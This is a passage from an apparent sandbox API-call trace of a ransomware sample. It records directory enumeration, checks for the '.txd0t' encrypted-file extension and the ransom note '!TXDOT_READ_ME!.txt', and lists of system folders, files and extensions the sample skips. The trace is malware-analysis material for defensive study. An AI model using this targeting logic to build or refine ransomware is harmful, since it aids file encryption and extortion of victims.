PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.563] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.563] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x580c28ce, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xef90, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.563] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.563] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.563] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0128.563] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0128.563] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1028\\LocalizedData.xml.txd0t" [0128.563] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.563] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.563] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.563] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.563] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.563] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1028", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028") returned="C:\\588bce7c90097ed212\\1028" [0128.563] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\") returned="C:\\588bce7c90097ed212\\1028\\" [0128.563] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1028\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1028\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1028\\SetupResources.dll" [0128.563] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.563] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.563] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.564] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.564] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.564] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.564] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.564] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.564] GetProcessHeap () returned 0xe30000 [0128.564] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.564] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5828f8fb, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5828f8fb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1029", cAlternateFileName="")) returned 1 [0128.564] StrCmpW (psz1="1029", psz2=".") returned 1 [0128.564] StrCmpW (psz1="1029", psz2="..") returned 1 [0128.564] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.564] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.564] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1029", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\system32\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\system\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\appdata\\local\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\boot\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\perflogs\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\programdata\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\drivers\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\wsus\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="crypt_detect") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="cryptolocker") returned 0x0 [0128.564] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="ransomware") returned 0x0 [0128.565] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="C:\\WINDOWS") returned 0x0 [0128.565] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.565] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1029", lpSrch="C:\\Program Files") returned 0x0 [0128.565] GetProcessHeap () returned 0xe30000 [0128.565] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.565] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0128.565] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\*") returned="C:\\588bce7c90097ed212\\1029\\*" [0128.565] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1029\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5828f8fb, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5828f8fb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2270 [0128.565] StrCmpW (psz1=".", psz2=".") returned 0 [0128.565] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5828f8fb, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5828f8fb, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.565] StrCmpW (psz1="..", psz2=".") returned 1 [0128.565] StrCmpW (psz1="..", psz2="..") returned 0 [0128.565] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5810ed51, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x5810ed51, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58134fc1, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0128.565] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0128.565] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0128.565] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0128.565] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0128.565] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\1029\\!TXDOT_READ_ME!.txt" [0128.565] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0128.565] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0128.565] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0128.565] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0128.565] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0128.565] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0128.565] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0128.565] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0128.565] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0128.565] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0128.565] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0128.566] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0128.566] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0128.566] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0128.566] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0128.566] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0128.566] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x5810ed51, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x108e, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0128.566] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0128.566] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0128.566] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0128.566] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0128.566] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\1029\\eula.rtf.txd0t" [0128.566] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0128.566] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.566] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5826658f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13e4a, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0128.566] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0128.566] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0128.566] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0128.566] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0128.566] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\1029\\LocalizedData.xml.txd0t" [0128.566] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0128.566] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0128.566] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0128.566] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0128.566] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0128.566] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1029", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029") returned="C:\\588bce7c90097ed212\\1029" [0128.566] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\") returned="C:\\588bce7c90097ed212\\1029\\" [0128.566] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1029\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1029\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\1029\\SetupResources.dll" [0128.566] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.566] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0128.566] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0128.566] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0128.566] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0128.566] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0128.566] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0128.567] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0128.567] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0128.567] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0128.567] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0128.567] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0128.567] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0128.567] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0128.567] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0128.567] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0128.567] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0128.567] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0128.567] FindNextFileW (in: hFindFile=0xec2270, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0128.567] FindClose (in: hFindFile=0xec2270 | out: hFindFile=0xec2270) returned 1 [0128.567] GetProcessHeap () returned 0xe30000 [0128.567] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x6874278 | out: hHeap=0xe30000) returned 1 [0128.567] FindNextFileW (in: hFindFile=0xec23b0, lpFindFileData=0x599f8f8 | out: lpFindFileData=0x599f8f8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5826658f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5826658f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="1030", cAlternateFileName="")) returned 1 [0128.567] StrCmpW (psz1="1030", psz2=".") returned 1 [0128.567] StrCmpW (psz1="1030", psz2="..") returned 1 [0128.567] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0128.567] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0128.567] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="1030", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0128.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\system32\\") returned 0x0 [0128.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\syswow64\\") returned 0x0 [0128.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\system\\") returned 0x0 [0128.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\windows\\winsxs\\") returned 0x0 [0128.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\appdata\\roaming\\") returned 0x0 [0128.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\appdata\\local\\") returned 0x0 [0128.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\appdata\\locallow\\") returned 0x0 [0128.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\all users\\microsoft\\") returned 0x0 [0128.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="\\inetpub\\logs\\") returned 0x0 [0128.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\boot\\") returned 0x0 [0128.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\perflogs\\") returned 0x0 [0128.567] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\programdata\\") returned 0x0 [0128.568] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\drivers\\") returned 0x0 [0128.568] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\wsus\\") returned 0x0 [0128.568] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\efstmpwp\\") returned 0x0 [0128.568] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch=":\\$recycle.bin\\") returned 0x0 [0128.568] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="crypt_detect") returned 0x0 [0128.568] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="cryptolocker") returned 0x0 [0128.568] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="ransomware") returned 0x0 [0128.568] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="C:\\WINDOWS") returned 0x0 [0128.568] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="C:\\Program Files (x86)") returned 0x0 [0128.568] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\1030", lpSrch="C:\\Program Files") returned 0x0 [0128.568] GetProcessHeap () returned 0xe30000 [0128.568] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x6874278 [0128.568] StrCpyNW (in: psz1=0x6874278, psz2="C:\\588bce7c90097ed212\\1030", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030") returned="C:\\588bce7c90097ed212\\1030" [0128.568] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\1030", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\1030\\*") returned="C:\\588bce7c90097ed212\\1030\\*" [0128.568] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\*", lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5826658f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5826658f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2370 [0128.568] StrCmpW (psz1=".", psz2=".") returned 0 [0128.568] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x5826658f, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x5826658f, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0128.568] StrCmpW (psz1="..", psz2=".") returned 1 [0128.568] StrCmpW (psz1="..", psz2="..") returned 0 [0128.568] FindNextFileW (in: hFindFile=0xec2370, lpFindFileData=0x599f648 | out: lpFindFileData=0x599f648*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x580c28ce, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x580c28ce, ftLastAccessTime.dwHighDateTime=0x1d64bcf, 